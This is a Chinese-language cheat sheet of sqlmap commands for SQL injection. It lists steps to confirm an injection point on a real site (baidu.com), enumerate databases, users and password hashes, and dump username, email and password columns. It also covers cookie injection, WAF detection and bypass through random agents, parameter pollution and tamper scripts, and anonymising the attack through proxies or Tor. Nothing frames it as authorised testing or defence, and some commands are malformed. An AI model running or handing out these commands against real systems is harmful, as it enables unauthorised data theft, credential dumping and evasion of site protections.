sqlmap -u http://www.baidu.com/news_show.aspx?id=97 检测注入点是否可用
sqlmap -u http://www.baidu.com/news_show.aspx?id=97 --tables 列出当前web数据库所有表名
nmap --script=vuln 漏洞扫描脚本 sqlmap -u 注入点 检测注入点是否可用
sqlmap -u 注入点 --dbs
sqlmap -u 注入点 --batch 自动输入 暴库 Web当前使用的数据库 sqlmap -u 注入点 --current-db
Web数据库使用的账户 sqlmap -u 注入点 --current-user 列出sqlserver所有用户 sqlmap -u 注入点 --users

列出表中字段

sqlmap -u 注入点 --passwords 列出数据库中的表 sqlmap -u 注入点 -D tourdata --tables (-D指定数据库名称)
sqlmap -u注入点-D tourdata -T userb -C “email,username,userpassword” --dump (将结果导出)
sqlmap -u 注入点 -D tourdata -T userb --columns
爆字段内容
指定导出特定范围字段内容
sqlmap -u “注入点” --cookie “id=97” --level 2
sqlmap -u注入点-D tourdata -T userb -C “email,username,userpassword”--start 1 --stop 10 --dump (1,10行数) Cookie注入 sqlmap -u “注入点” --table --cookie “id=97” --level 2
python sqlmap.py -u “注入点” -f --banner --dbs --users
sqlmap -u “注入点” --columns -T “user” --cookie “id=97” --level 2 sqlmap -u “注入点” --dump -C “username,password”--columns -T “user” --cookie “id=97” --level 2 可对以上参数进行结合使用 绕过防火墙注入 确认是否开了WAF
Sqlmap -u “注入点” --delay=3.5 --time-sec=60
Sqlmap -u “注入点” --thread 10 --identify-waf (首选) sqlmap -u “注入点” --thread 10 --check-waf 备选 使用参数绕过 Sqlmap -u “注入点” --random-agent -v 2 (浏览器绕过) Sqlmap -u “注入点” --hpp -v 3 (参数污染绕过)
sqlmap -u “注入点” --mobile 对移动端的服务器进行注入
Sqlmap -u “注入点” --proxy=211.211.211.211.8080 --proxy-cred=211.:985 代理注入 sqlmap -u “注入点” --ignore-proxy 禁止用代理注入,直接注入 sqlmap -u “注入点” --flush-session 清空会话,重构注入 sqlmap -u “注入点” -hex 或者--no-cast 进行字符码转换 sqlmap -u “注入点” --tor 匿名注入 脚本注入的格式

sqlmap -u “注入点” --tamper=A.py,B.py A,B是脚本


将payload进行URL编码注入

sqlmap -r 1.txt --tamper=charencode